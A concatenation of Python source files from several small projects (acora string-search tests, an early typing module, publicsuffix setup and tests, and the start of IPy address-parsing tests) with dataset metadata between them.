if os.environ.get("TEST_DRIVER_LITE", False):
test_driver_lite()
else:
test_driver()
``` |
{
"source": "1py/acora",
"score": 2
} |
#### File: 1py/acora/test.py
```python
import acora
if acora.BytesAcora is acora.PyAcora or acora.UnicodeAcora is acora.PyAcora:
print("WARNING: '_acora' C extension not imported, only testing Python implementation")
import re
import sys
import unittest
import codecs
import string
# compat stuff ...
try:
unicode
except NameError:
unicode = str
try:
bytes
except NameError:
bytes = str
try:
# Python 2.6+
from io import StringIO as _StringIO, BytesIO as _BytesIO
except ImportError:
# Python 2
from StringIO import StringIO as _StringIO
_BytesIO = _StringIO
def BytesIO(*args):
if args and isinstance(args[0], unicode):
args = (args[0].encode("UTF-8"),)
return _BytesIO(*args)
def StringIO(*args):
if args and isinstance(args[0], bytes):
args = (args[0].decode("UTF-8"),)
return _BytesIO(*args)
unicode_unescaper = codecs.lookup("unicode_escape")
def unescape_unicode(s):
return unicode_unescaper.decode(s)[0]
def prepare_test_data():
s = ('bdfdaskdjfhaslkdhfsadhfklashdflabcasdabcdJAKHDBVDFLNFCBLSADHFCALKSJ'
'jklhcnajskbhfasjhancfksjdfhbvaliuradefhzcbdegnashdgfbcjaabesdhgkfcnash'
'fdkhbdegxcbgjsvdhabcabcfcgbnxahsdbgfbcakjsdhgnfcxsababcmdabe')
s = s.lower() + s + s.upper()
search_string = s * 1000
all_keywords = [
'ab', 'abc', 'abcd', 'abcabc', 'ababc', 'ABBBC', 'ABCABC',
'bdfd', 'ade', 'abe', 'bdeg', 'fklash',
'gnfcxsababcmdabe', 'SADHFCAL',
'notthere', 'not-to-be-found', 'not-to-be-found-either',
]
if sys.version_info[0] < 3:
all_keywords = list(map(unicode, all_keywords))
search_string = unicode(search_string)
return search_string, all_keywords
class AcoraTest(object):
search_string, all_keywords = prepare_test_data()
def _build(self, *keywords):
keywords = list(map(self._swrap, keywords))
return acora.AcoraBuilder(*keywords).build(acora=self.acora)
def _build_ignore_case(self, *keywords):
keywords = list(map(self._swrap, keywords))
return acora.AcoraBuilder(*keywords).build(
ignore_case=True, acora=self.acora)
def _result(self, result):
s = self._swrap
return [ (s(k), pos) for k,pos in result ]
# basic tests
def test_finditer_single_keyword(self):
s = self._swrap
finditer = self._build('bc').finditer
self.assertEquals(
sorted(finditer(s('abcd'))),
self._result([('bc', 1)]))
def test_finditer_many_keywords(self):
s = self._swrap
finditer = self._build(*string.ascii_letters).finditer
self.assertEquals(
sorted(finditer(s('abcd'))),
self._result([('a', 0), ('b', 1), ('c', 2), ('d', 3)]))
def test_finditer_many_keywords_not_found(self):
s = self._swrap
finditer = self._build(*string.ascii_letters).finditer
self.assertEquals(sorted(finditer(s(string.digits*100))), [])
def test_finditer_sequential(self):
s = self._swrap
finditer = self._build('a', 'b', 'c', 'd').finditer
self.assertEquals(
sorted(finditer(s('abcd'))),
self._result([('a', 0), ('b', 1), ('c', 2), ('d', 3)]))
def test_finditer_redundant(self):
s = self._swrap
finditer = self._build('a', 'b', 'A', 'B').finditer
self.assertEquals(
sorted(finditer(s('AaBb'))),
self._result([('A', 0), ('B', 2), ('a', 1), ('b', 3)]))
def test_finditer_overlap(self):
s = self._swrap
finditer = self._build('a', 'ab', 'abc', 'abcd').finditer
self.assertEquals(
sorted(finditer(s('abcd'))),
self._result([('a', 0), ('ab', 0), ('abc', 0), ('abcd', 0)]))
def test_finditer_reverse_overlap(self):
s = self._swrap
finditer = self._build('d', 'cd', 'bcd', 'abcd').finditer
self.assertEquals(
sorted(finditer(s('abcd'))),
self._result([('abcd', 0), ('bcd', 1), ('cd', 2), ('d', 3)]))
def test_deepcopy_builder(self):
from copy import deepcopy
s = self._swrap
builder1 = acora.AcoraBuilder(*list(map(s, ['a', 'b', 'c'])))
builder2 = deepcopy(builder1)
builder2.add(s('ab'), s('bc'))
finditer1 = builder1.build(acora=self.acora).finditer
finditer2 = builder2.build(acora=self.acora).finditer
self.assertEquals(
sorted(finditer1(s('abcd'))),
self._result([('a', 0), ('b', 1), ('c', 2)]))
self.assertEquals(
sorted(finditer2(s('abcd'))),
self._result([('a', 0), ('ab', 0), ('b', 1), ('bc', 1), ('c', 2)]))
class UnicodeAcoraTest(unittest.TestCase, AcoraTest):
# only unicode data tests
from acora import UnicodeAcora as acora
def _swrap(self, s):
if not isinstance(s, unicode):
s = s.decode('utf-8')
return unescape_unicode(s)
def test_finditer_line_endings(self):
s = self._swrap
finditer = self._build_ignore_case('a', 'b', 'c', 'd', '\r', '\n').finditer
line = 0
line_matches = []
current_line_matches = []
last_ending = None
for kw, pos in finditer(s('Aa\r\nB\nbC\n\rcD\r\nd')):
if kw in '\r\n':
if last_ending == '\r' and kw == '\n':
continue
line_matches.append(tuple(current_line_matches))
del current_line_matches[:]
last_ending = kw
line += 1
else:
last_ending = None
current_line_matches.append(kw)
line_matches.append(tuple(current_line_matches))
self.assertEquals(line, 5)
self.assertEquals(
line_matches,
[('a', 'a'), ('b',), ('b', 'c'), (), ('c', 'd'), ('d',)])
def test_finditer_single_keyword_unicode(self):
s = self._swrap
finditer = self._build(unicode("\\uF8D2")).finditer
self.assertEquals(
list(finditer(s(unicode("\\uF8D1\\uF8D2\\uF8D3")))),
self._result([(unicode("\\uF8D2"), 1)]))
def test_finditer_ignore_case(self):
s = self._swrap
finditer = self._build_ignore_case('a', 'b', 'c', 'd').finditer
self.assertEquals(
sorted(finditer(s('AaBbCcDd'))),
self._result([('a', 0), ('a', 1), ('b', 2), ('b', 3),
('c', 4), ('c', 5), ('d', 6), ('d', 7)]))
def test_finditer_ignore_case_redundant(self):
s = self._swrap
finditer = self._build_ignore_case('a', 'b', 'A', 'B').finditer
self.assertEquals(
sorted(finditer(s('AaBb'))),
self._result([('A', 0), ('A', 1), ('B', 2), ('B', 3),
('a', 0), ('a', 1), ('b', 2), ('b', 3)]))
class BytesAcoraTest(unittest.TestCase, AcoraTest):
# only byte data tests
from acora import BytesAcora as acora
simple_data = 'abc' + ('a'*100+'b'*100)*1000 + 'abcde'
simple_kwds = ['abc'.encode('ASCII'),
'abcde'.encode('ASCII')]
last_match_pos = len(simple_data) - 5
expected_result = [(simple_kwds[0], 0),
(simple_kwds[0], last_match_pos),
(simple_kwds[1], last_match_pos)]
def _swrap(self, s):
if isinstance(s, unicode):
s = s.encode('ISO-8859-1')
return s
def _search_in_file(self, ac, data):
import tempfile
tmp = tempfile.TemporaryFile()
try:
tmp.write(data.encode('ASCII'))
tmp.seek(0)
return list(ac.filefind(tmp))
finally:
tmp.close()
def test_large_filelike_searching(self):
filefind = self._build('SADHFCAL'.encode('ASCII'),
'bdeg'.encode('ASCII')).filefind
data = BytesIO(self.search_string)
result = list(filefind(data))
self.assertEquals(len(result), 6000)
def test_large_filelike_searching_check(self):
ac = self._build(*self.simple_kwds)
data = BytesIO(self.simple_data)
result = list(ac.filefind(data))
self.assertEquals(result, self.expected_result)
def test_file_searching(self):
ac = self._build([ kw.encode('ASCII')
for kw in ('a', 'b', 'ab', 'abc') ])
result = self._search_in_file(ac, 'abbabc')
self.assertEquals(len(result), 8)
def test_large_file_searching(self):
ac = self._build('SADHFCAL'.encode('ASCII'),
'bdeg'.encode('ASCII'))
result = self._search_in_file(ac, self.search_string)
self.assertEquals(len(result), 6000)
def test_large_file_searching_check(self):
ac = self._build(*self.simple_kwds)
result = self._search_in_file(ac, self.simple_data)
self.assertEquals(result, self.expected_result)
def test_binary_data_search(self):
pattern = self._swrap('\xa5\x66\x80')
ac = self._build(pattern)
mainString = self._swrap(10 * '\xf0') + pattern + self._swrap(10 * '\xf0')
result = ac.findall(mainString)
self.assertEquals(result, [(pattern, 10)])
def test_binary_data_search_start(self):
pattern = self._swrap('\xa5\x66\x80')
ac = self._build(pattern)
mainString = pattern + self._swrap(10 * '\xf0')
result = ac.findall(mainString)
self.assertEquals(result, [(pattern, 0)])
def test_binary_data_search_end(self):
pattern = self._swrap('\xa5\x66\x80')
ac = self._build(pattern)
mainString = self._swrap(10 * '\xf0') + pattern
result = ac.findall(mainString)
self.assertEquals(result, [(pattern, 10)])
class PyAcoraTest(UnicodeAcoraTest, BytesAcoraTest):
# both types of tests work here
from acora import PyAcora as acora
test_binary_data_search = None
test_binary_data_search_start = None
test_binary_data_search_end = None
def _swrap(self, s):
if isinstance(s, unicode):
s = unescape_unicode(s)
return s
def suite():
import doctest
suite = unittest.TestSuite([
unittest.makeSuite(UnicodeAcoraTest),
unittest.makeSuite(BytesAcoraTest),
unittest.makeSuite(PyAcoraTest),
doctest.DocTestSuite(),
doctest.DocFileSuite('README.rst'),
])
return suite
if __name__ == "__main__":
import sys
args = sys.argv[1:]
verbosity = min(2, args.count('-v') + args.count('-vv')*2)
unittest.TextTestRunner(verbosity=verbosity).run(suite())
``` |
{
"source": "1py/mypy",
"score": 3
} |
#### File: lib-typing/3.2/typing.py
```python
from abc import ABCMeta, abstractmethod, abstractproperty
import inspect
import sys
import re
__all__ = [
# Type system related
'AbstractGeneric',
'AbstractGenericMeta',
'Any',
'Dict',
'Generic',
'GenericMeta',
'IO',
'List',
'Match',
'Pattern',
'Protocol',
'Set',
'Tuple',
'Undefined',
'cast',
'forwardref',
'overload',
'typevar',
# Protocols and abstract base classes
'Container',
'Iterable',
'Iterator',
'Sequence',
'Sized',
'AbstractSet',
'Mapping',
'BinaryIO',
'TextIO',
]
def builtinclass(cls):
"""Mark a class as a built-in/extension class for type checking."""
return cls
def ducktype(type):
"""Return a duck type declaration decorator.
The decorator only affects type checking.
"""
def decorator(cls):
return cls
return decorator
def disjointclass(type):
"""Return a disjoint class declaration decorator.
The decorator only affects type checking.
"""
def decorator(cls):
return cls
return decorator
class GenericMeta(type):
"""Metaclass for generic classes that support indexing by types."""
def __getitem__(self, args):
# Just ignore args; they are for compile-time checks only.
return self
class Generic(metaclass=GenericMeta):
"""Base class for generic classes."""
class AbstractGenericMeta(ABCMeta):
"""Metaclass for abstract generic classes that support type indexing.
This is used for both protocols and ordinary abstract classes.
"""
def __new__(mcls, name, bases, namespace):
cls = super().__new__(mcls, name, bases, namespace)
# 'Protocol' must be an explicit base class in order for a class to
# be a protocol.
cls._is_protocol = name == 'Protocol' or Protocol in bases
return cls
def __getitem__(self, args):
# Just ignore args; they are for compile-time checks only.
return self
class Protocol(metaclass=AbstractGenericMeta):
"""Base class for protocol classes."""
@classmethod
def __subclasshook__(cls, c):
if not cls._is_protocol:
# No structural checks since this isn't a protocol.
return NotImplemented
if cls is Protocol:
# Every class is a subclass of the empty protocol.
return True
# Find all attributes defined in the protocol.
attrs = cls._get_protocol_attrs()
for attr in attrs:
if not any(attr in d.__dict__ for d in c.__mro__):
return NotImplemented
return True
@classmethod
def _get_protocol_attrs(cls):
# Get all Protocol base classes.
protocol_bases = []
for c in cls.__mro__:
if getattr(c, '_is_protocol', False) and c.__name__ != 'Protocol':
protocol_bases.append(c)
# Get attributes included in protocol.
attrs = set()
for base in protocol_bases:
for attr in base.__dict__.keys():
# Include attributes not defined in any non-protocol bases.
for c in cls.__mro__:
if (c is not base and attr in c.__dict__ and
not getattr(c, '_is_protocol', False)):
break
else:
if (not attr.startswith('_abc_') and
attr != '__abstractmethods__' and
attr != '_is_protocol' and
attr != '__dict__' and
attr != '_get_protocol_attrs' and
attr != '__module__'):
attrs.add(attr)
return attrs
class AbstractGeneric(metaclass=AbstractGenericMeta):
"""Base class for abstract generic classes."""
class TypeAlias:
"""Class for defining generic aliases for library types."""
def __init__(self, target_type):
self.target_type = target_type
def __getitem__(self, typeargs):
return self.target_type
# Define aliases for built-in types that support indexing.
List = TypeAlias(list)
Dict = TypeAlias(dict)
Set = TypeAlias(set)
Tuple = TypeAlias(tuple)
Function = TypeAlias(callable)
Pattern = TypeAlias(type(re.compile('')))
Match = TypeAlias(type(re.match('', '')))
class typevar:
def __init__(self, name, *, values=None):
self.name = name
self.values = values
# Predefined type variables.
AnyStr = typevar('AnyStr', values=(str, bytes))
class forwardref:
def __init__(self, name):
self.name = name
def Any(x):
"""The Any type; can also be used to cast a value to type Any."""
return x
def cast(type, object):
"""Cast a value to a type.
This only affects static checking; simply return object at runtime.
"""
return object
def overload(func):
"""Function decorator for defining overloaded functions."""
frame = sys._getframe(1)
locals = frame.f_locals
# See if there is a previous overload variant available. Also verify
# that the existing function really is overloaded: otherwise, replace
# the definition. The latter is actually important if we want to reload
# a library module such as genericpath with a custom one that uses
# overloading in the implementation.
if func.__name__ in locals and hasattr(locals[func.__name__], 'dispatch'):
orig_func = locals[func.__name__]
def wrapper(*args, **kwargs):
ret, ok = orig_func.dispatch(*args, **kwargs)
if ok:
return ret
return func(*args, **kwargs)
wrapper.isoverload = True
wrapper.dispatch = make_dispatcher(func, orig_func.dispatch)
wrapper.next = orig_func
wrapper.__name__ = func.__name__
if hasattr(func, '__isabstractmethod__'):
# Note that we can't reliably check that abstractmethod is
# used consistently across overload variants, so we let a
# static checker do it.
wrapper.__isabstractmethod__ = func.__isabstractmethod__
return wrapper
else:
# Return the initial overload variant.
func.isoverload = True
func.dispatch = make_dispatcher(func)
func.next = None
return func
def is_erased_type(t):
return t is Any or isinstance(t, typevar)
def make_dispatcher(func, previous=None):
"""Create argument dispatcher for an overloaded function.
Also handle chaining of multiple overload variants.
"""
(args, varargs, varkw, defaults,
kwonlyargs, kwonlydefaults, annotations) = inspect.getfullargspec(func)
argtypes = []
for arg in args:
ann = annotations.get(arg)
if isinstance(ann, forwardref):
ann = ann.name
if is_erased_type(ann):
ann = None
elif isinstance(ann, str):
# The annotation is a string => evaluate it lazily when the
# overloaded function is first called.
frame = sys._getframe(2)
t = [None]
ann_str = ann
def check(x):
if not t[0]:
# Evaluate string in the context of the overload caller.
t[0] = eval(ann_str, frame.f_globals, frame.f_locals)
if is_erased_type(t[0]):
# Anything goes.
t[0] = object
if isinstance(t[0], type):
return isinstance(x, t[0])
else:
return t[0](x)
ann = check
argtypes.append(ann)
maxargs = len(argtypes)
minargs = maxargs
if defaults:
minargs = len(argtypes) - len(defaults)
def dispatch(*args, **kwargs):
if previous:
ret, ok = previous(*args, **kwargs)
if ok:
return ret, ok
nargs = len(args)
if nargs < minargs or nargs > maxargs:
# Invalid argument count.
return None, False
for i in range(nargs):
argtype = argtypes[i]
if argtype:
if isinstance(argtype, type):
if not isinstance(args[i], argtype):
break
else:
if not argtype(args[i]):
break
else:
return func(*args, **kwargs), True
return None, False
return dispatch
class Undefined:
"""Class that represents an undefined value with a specified type.
At runtime the name Undefined is bound to an instance of this
class. The intent is that any operation on an Undefined object
raises an exception, including use in a boolean context. Some
operations cannot be disallowed: Undefined can be used as an
operand of 'is', and it can be assigned to variables and stored in
containers.
'Undefined' makes it possible to declare the static type of a
variable even if there is no useful default value to initialize it
with:
from typing import Undefined
x = Undefined(int)
y = Undefined # type: int
The latter form can be used if efficiency is of utmost importance,
since it saves a call operation and potentially additional
operations needed to evaluate a type expression. Undefined(x)
just evaluates to Undefined, ignoring the argument value.
"""
def __repr__(self):
return '<typing.Undefined>'
def __setattr__(self, attr, value):
raise AttributeError("'Undefined' object has no attribute '%s'" % attr)
def __eq__(self, other):
raise TypeError("'Undefined' object cannot be compared")
def __call__(self, type):
return self
def __bool__(self):
raise TypeError("'Undefined' object is not valid as a boolean")
Undefined = Undefined()
# Abstract classes
T = typevar('T')
KT = typevar('KT')
VT = typevar('VT')
class SupportsInt(Protocol):
@abstractmethod
def __int__(self) -> int: pass
class SupportsFloat(Protocol):
@abstractmethod
def __float__(self) -> float: pass
class SupportsAbs(Protocol[T]):
@abstractmethod
def __abs__(self) -> T: pass
class SupportsRound(Protocol[T]):
@abstractmethod
def __round__(self, ndigits: int = 0) -> T: pass
class Reversible(Protocol[T]):
@abstractmethod
def __reversed__(self) -> 'Iterator[T]': pass
class Sized(Protocol):
@abstractmethod
def __len__(self) -> int: pass
class Container(Protocol[T]):
@abstractmethod
def __contains__(self, x) -> bool: pass
class Iterable(Protocol[T]):
@abstractmethod
def __iter__(self) -> 'Iterator[T]': pass
class Iterator(Iterable[T], Protocol[T]):
@abstractmethod
def __next__(self) -> T: pass
class Sequence(Sized, Iterable[T], Container[T], AbstractGeneric[T]):
@abstractmethod
@overload
def __getitem__(self, i: int) -> T: pass
@abstractmethod
@overload
def __getitem__(self, s: slice) -> 'Sequence[T]': pass
@abstractmethod
def __reversed__(self, s: slice) -> Iterator[T]: pass
@abstractmethod
def index(self, x) -> int: pass
@abstractmethod
def count(self, x) -> int: pass
for t in list, tuple, str, bytes, range:
Sequence.register(t)
class AbstractSet(Sized, Iterable[T], AbstractGeneric[T]):
@abstractmethod
def __contains__(self, x: object) -> bool: pass
@abstractmethod
def __and__(self, s: 'AbstractSet[T]') -> 'AbstractSet[T]': pass
@abstractmethod
def __or__(self, s: 'AbstractSet[T]') -> 'AbstractSet[T]': pass
@abstractmethod
def __sub__(self, s: 'AbstractSet[T]') -> 'AbstractSet[T]': pass
@abstractmethod
def __xor__(self, s: 'AbstractSet[T]') -> 'AbstractSet[T]': pass
@abstractmethod
def isdisjoint(self, s: 'AbstractSet[T]') -> bool: pass
for t in set, frozenset, type({}.keys()), type({}.items()):
AbstractSet.register(t)
class Mapping(Sized, Iterable[KT], AbstractGeneric[KT, VT]):
@abstractmethod
def __getitem__(self, k: KT) -> VT: pass
@abstractmethod
def __setitem__(self, k: KT, v: VT) -> None: pass
@abstractmethod
def __delitem__(self, v: KT) -> None: pass
@abstractmethod
def __contains__(self, o: object) -> bool: pass
@abstractmethod
def clear(self) -> None: pass
@abstractmethod
def copy(self) -> 'Mapping[KT, VT]': pass
@overload
@abstractmethod
def get(self, k: KT) -> VT: pass
@overload
@abstractmethod
def get(self, k: KT, default: VT) -> VT: pass
@overload
@abstractmethod
def pop(self, k: KT) -> VT: pass
@overload
@abstractmethod
def pop(self, k: KT, default: VT) -> VT: pass
@abstractmethod
def popitem(self) -> Tuple[KT, VT]: pass
@overload
@abstractmethod
def setdefault(self, k: KT) -> VT: pass
@overload
@abstractmethod
def setdefault(self, k: KT, default: VT) -> VT: pass
@overload
@abstractmethod
def update(self, m: 'Mapping[KT, VT]') -> None: pass
@overload
@abstractmethod
def update(self, m: Iterable[Tuple[KT, VT]]) -> None: pass
@abstractmethod
def keys(self) -> AbstractSet[KT]: pass
@abstractmethod
def values(self) -> AbstractSet[VT]: pass
@abstractmethod
def items(self) -> AbstractSet[Tuple[KT, VT]]: pass
# TODO Consider more types: os.environ, etc. However, these add dependencies.
Mapping.register(dict)
# Note that the BinaryIO and TextIO classes must be in sync with typing module
# stubs.
class IO(AbstractGeneric[AnyStr]):
@abstractproperty
def mode(self) -> str: pass
@abstractproperty
def name(self) -> str: pass
@abstractmethod
def close(self) -> None: pass
@abstractmethod
def closed(self) -> bool: pass
@abstractmethod
def fileno(self) -> int: pass
@abstractmethod
def flush(self) -> None: pass
@abstractmethod
def isatty(self) -> bool: pass
@abstractmethod
def read(self, n: int = -1) -> AnyStr: pass
@abstractmethod
def readable(self) -> bool: pass
@abstractmethod
def readline(self, limit: int = -1) -> AnyStr: pass
@abstractmethod
def readlines(self, hint: int = -1) -> List[AnyStr]: pass
@abstractmethod
def seek(self, offset: int, whence: int = 0) -> int: pass
@abstractmethod
def seekable(self) -> bool: pass
@abstractmethod
def tell(self) -> int: pass
@abstractmethod
def truncate(self, size: int = None) -> int: pass
@abstractmethod
def writable(self) -> bool: pass
@abstractmethod
def write(self, s: AnyStr) -> int: pass
@abstractmethod
def writelines(self, lines: List[AnyStr]) -> None: pass
@abstractmethod
def __enter__(self) -> 'IO[AnyStr]': pass
@abstractmethod
def __exit__(self, type, value, traceback) -> None: pass
class BinaryIO(IO[bytes]):
@overload
@abstractmethod
def write(self, s: bytes) -> int: pass
@overload
@abstractmethod
def write(self, s: bytearray) -> int: pass
@abstractmethod
def __enter__(self) -> 'BinaryIO': pass
class TextIO(IO[str]):
@abstractproperty
def buffer(self) -> BinaryIO: pass
@abstractproperty
def encoding(self) -> str: pass
@abstractproperty
def errors(self) -> str: pass
@abstractproperty
def line_buffering(self) -> bool: pass
@abstractproperty
def newlines(self) -> Any: pass
@abstractmethod
def __enter__(self) -> 'TextIO': pass
# TODO Register IO/TextIO/BinaryIO as the base class of file-like types.
del t
``` |
{
"source": "1py/publicsuffix",
"score": 2
} |
#### File: publicsuffix/Solc/setup.py
```python
from distutils.core import Command, setup
from distutils.command.install import INSTALL_SCHEMES
import unittest
UNITTESTS = [
"tests",
]
class TestCommand(Command):
user_options = [ ]
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
suite = unittest.TestSuite()
suite.addTests(
unittest.defaultTestLoader.loadTestsFromNames(
UNITTESTS ) )
result = unittest.TextTestRunner(verbosity=2).run(suite)
# Install data file into the same path as the module
for scheme in INSTALL_SCHEMES.values():
scheme['data'] = scheme['purelib']
setup(name='publicsuffix',
version='1.0.4',
description='Get a public suffix for a domain name using the Public Suffix List.',
license='MIT',
long_description=open("README").read(),
author='<NAME>',
author_email='<EMAIL>',
py_modules = ['publicsuffix'],
data_files = [('', ['publicsuffix.txt'])],
provides = [ 'publicsuffix' ],
cmdclass = { 'test': TestCommand },
classifiers = [
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3",
"Topic :: Internet :: Name Service (DNS)",
],
)
```
#### File: publicsuffix/tests/test_domstruct.py
```python
print('Executing %s' % __file__)
import unittest
import os, sys, time
from netutils import publicsuffix
class Test_get_domain_struct (unittest.TestCase):
"""
"""
def test_normal_fqdn_level6 (self):
domain = '6.5.4.3.google.co.uk'
ds = publicsuffix.DomainStruct(domain)
self.assertEqual (ds.nowww, '6.5.4.3.google.co.uk')
self.assertEqual (ds.eSLD, 'google')
self.assertEqual (ds.sub, '6.5.4.3')
self.assertEqual (ds.isFQDN, True)
self.assertListEqual(ds.eTkLD, [
'co.uk', # eTLD
'google.co.uk',
'3.google.co.uk',
'4.3.google.co.uk',
'5.4.3.google.co.uk',
'6.5.4.3.google.co.uk',
])
def test_normal_fqdn_level3 (self):
domain = 'www.google.co.uk'
ds = publicsuffix.DomainStruct(domain)
self.assertEqual (ds.nowww, 'google.co.uk')
self.assertEqual (ds.eSLD, 'google')
self.assertEqual (ds.sub, 'www')
self.assertEqual (ds.isFQDN, True)
self.assertListEqual(ds.eTkLD, [
'co.uk', # eTLD
'google.co.uk',
'www.google.co.uk',
])
def test_normal_fqdn_level2 (self):
domain = 'google.co.uk'
ds = publicsuffix.DomainStruct(domain)
self.assertEqual (ds.nowww, 'google.co.uk')
self.assertEqual (ds.eSLD, 'google')
self.assertEqual (ds.sub, '')
self.assertEqual (ds.isFQDN, True)
self.assertListEqual(ds.eTkLD, [
'co.uk', # eTLD
'google.co.uk',
])
def test_normal_nonfqdn (self):
domain = 'www.user.local'
ds = publicsuffix.DomainStruct (domain)
self.assertEqual (ds.nowww, 'user.local')
self.assertEqual (ds.eSLD, None)
self.assertEqual (ds.isFQDN, False)
self.assertListEqual(ds.eTkLD, [])
if __name__ == '__main__':
unittest.main()
```
#### File: publicsuffix/tests/test_publicsuffix.py
```python
print('Executing %s' % __file__)
import unittest
import os, sys, time
from netutils import publicsuffix
#import publicsuffix
class Test_get_public_suffix (unittest.TestCase):
""" Test the main publicsuffix.get_public_suffix() interface.
"""
def test_basic (self):
for d in [
'3ld.google.com',
'4ld.3ld.google.com',
'5ld.4ld.3ld.google.com',
]:
self.assertEqual('google.com',
publicsuffix.get_public_suffix(d))
# The following test cases are originally from
# http://mxr.mozilla.org/mozilla-central/source/netwerk/test/unit/data/test_psl.txt?raw=1
# and adapted by Tomaz Solc
def _checkPublicSuffix(self, a, b):
self.assertEqual(publicsuffix.get_public_suffix(a), b)
def test_mixed_case (self):
checkPublicSuffix = self._checkPublicSuffix
checkPublicSuffix('COM', 'com');
checkPublicSuffix('example.COM', 'example.com');
checkPublicSuffix('WwW.example.COM', 'example.com');
def test_leading_dot (self):
checkPublicSuffix = self._checkPublicSuffix
checkPublicSuffix('.com', 'com');
checkPublicSuffix('.example', 'example');
checkPublicSuffix('.example.com', 'example.com');
checkPublicSuffix('.example.example', 'example');
def test_unlisted_tld (self):
checkPublicSuffix = self._checkPublicSuffix
checkPublicSuffix('example', 'example');
checkPublicSuffix('example.example', 'example');
checkPublicSuffix('b.example.example', 'example');
checkPublicSuffix('a.b.example.example', 'example');
def test_listed_but_non_internet_tld (self):
checkPublicSuffix = self._checkPublicSuffix
checkPublicSuffix('local', 'local');
checkPublicSuffix('example.local', 'local');
checkPublicSuffix('b.example.local', 'local');
checkPublicSuffix('a.b.example.local', 'local');
def test_tld_with_only_1_rule (self):
checkPublicSuffix = self._checkPublicSuffix
checkPublicSuffix('biz', 'biz');
checkPublicSuffix('domain.biz', 'domain.biz');
checkPublicSuffix('b.domain.biz', 'domain.biz');
checkPublicSuffix('a.b.domain.biz', 'domain.biz');
def test_tld_with_some_2_level_rules (self):
checkPublicSuffix = self._checkPublicSuffix
checkPublicSuffix('com', 'com');
checkPublicSuffix('example.com', 'example.com');
checkPublicSuffix('b.example.com', 'example.com');
checkPublicSuffix('a.b.example.com', 'example.com');
checkPublicSuffix('uk.com', 'uk.com');
checkPublicSuffix('example.uk.com', 'example.uk.com');
checkPublicSuffix('b.example.uk.com', 'example.uk.com');
checkPublicSuffix('a.b.example.uk.com', 'example.uk.com');
checkPublicSuffix('test.ac', 'test.ac');
def test_tld_with_only_1_wildcard_rule (self):
""" For example,
// bd : http://en.wikipedia.org/wiki/.bd
*.bd
To be distinguished from
// eu : http://en.wikipedia.org/wiki/.eu
eu
It seems that the effective_tld_names list has a bug on this.
If there is a wildcard rule '*.bd', there should also be a rule
'bd', or other exception rules.
"""
checkPublicSuffix = self._checkPublicSuffix
checkPublicSuffix('cy', 'cy');
checkPublicSuffix('c.cy', 'c.cy');
checkPublicSuffix('b.c.cy', 'b.c.cy');
checkPublicSuffix('a.b.c.cy', 'b.c.cy');
# These may seem counter-intuitive. No body believes that '2011.il' is
# a valid TLD.
checkPublicSuffix('www.2011.il', 'www.2011.il')
checkPublicSuffix('www.aabop-ziiy.kw', 'www.aabop-ziiy.kw')
def test_tld_with_wildcard_rule_and_exceptions (self):
checkPublicSuffix = self._checkPublicSuffix
checkPublicSuffix('om', 'om');
checkPublicSuffix('test.om', 'test.om');
checkPublicSuffix('b.test.om', 'b.test.om');
checkPublicSuffix('a.b.test.om', 'b.test.om');
checkPublicSuffix('songfest.om', 'songfest.om');
checkPublicSuffix('www.songfest.om', 'songfest.om');
def test_more_complex_tld (self):
checkPublicSuffix = self._checkPublicSuffix
checkPublicSuffix('jp', 'jp');
checkPublicSuffix('test.jp', 'test.jp');
checkPublicSuffix('www.test.jp', 'test.jp');
checkPublicSuffix('ac.jp', 'ac.jp');
checkPublicSuffix('test.ac.jp', 'test.ac.jp');
checkPublicSuffix('www.test.ac.jp', 'test.ac.jp');
checkPublicSuffix('kobe.jp', 'kobe.jp');
checkPublicSuffix('c.kobe.jp', 'c.kobe.jp');
checkPublicSuffix('b.c.kobe.jp', 'b.c.kobe.jp');
checkPublicSuffix('a.b.c.kobe.jp', 'b.c.kobe.jp');
checkPublicSuffix('city.kobe.jp', 'city.kobe.jp'); # Exception rule.
checkPublicSuffix('www.city.kobe.jp', 'city.kobe.jp'); # Exception rule.
def test_us_k12_tld (self):
checkPublicSuffix = self._checkPublicSuffix
checkPublicSuffix('us', 'us');
checkPublicSuffix('test.us', 'test.us');
checkPublicSuffix('www.test.us', 'test.us');
checkPublicSuffix('ak.us', 'ak.us');
checkPublicSuffix('test.ak.us', 'test.ak.us');
checkPublicSuffix('www.test.ak.us', 'test.ak.us');
checkPublicSuffix('k12.ak.us', 'k12.ak.us');
checkPublicSuffix('test.k12.ak.us', 'test.k12.ak.us');
checkPublicSuffix('www.test.k12.ak.us', 'test.k12.ak.us');
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "1py/python-ipy",
"score": 2
} |
#### File: python-ipy/test/test_IPy.py
```python
import sys
import threading
sys.path.append('.')
sys.path.append('..')
import IPy
import unittest
import random
testloops = 250
class parseAddress(unittest.TestCase):
okValues = [('fc00:db20:35b:7399::5', 338770000845734292534325025077361652240),
('FEDCBA9876543210FEDCBA9876543210', 338770000845734292534325025077361652240),
('0xFEDCBA9876543210FEDCBA9876543210', 338770000845734292534325025077361652240),
('fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b', 21932261930451111902915077091070067066),
('fdf8:f53e:61e4::18', 21932261930451111902915077091070067066),
('fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b:200C:417A', 21932261930451111902915077091070067066),
('fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b:200C:417A', 21932261930451111902915077091070067066),
('fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b', 338958331222012082418099330867817087043),
('fc00:e968:6179::de52:7100:43', 338958331222012082418099330867817087043),
('fc00:e968:6179::de52:7100', 338958331222012082418099330867817087043),
('0:0:0:0:0:0:0:1', 1),
('0:0:0::0:0:1', 1),
('::1', 1),
('0:0:0:0:0:0:0:0', 0),
('0:0:0::0:0:0', 0),
('::', 0),
('0:0:0:0:0:0:13.1.68.3', 218186755),
('::13.1.68.3', 218186755),
('0:0:0:0:0:FFFF:1172.16.17.32', 281472855454758),
('::FFFF:192.168.127.12', 281472855454758),
('fdf8:f53e:61e4::18', 21932261930451111902915077091070067066),
('fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b', 21932261930451111902915077091070067066),
('0.0.0.0', 0),
('0', 0),
('127.0.0.1', 2130706433),
('255.255.255.255', 4294967295),
('0.0.0.1', 1),
('1', 16777216),
('192.168.127.12', 3588059479),
('0000', 0),
('127001', 127001),
('1234576', 1234576),
('1', 16777216),
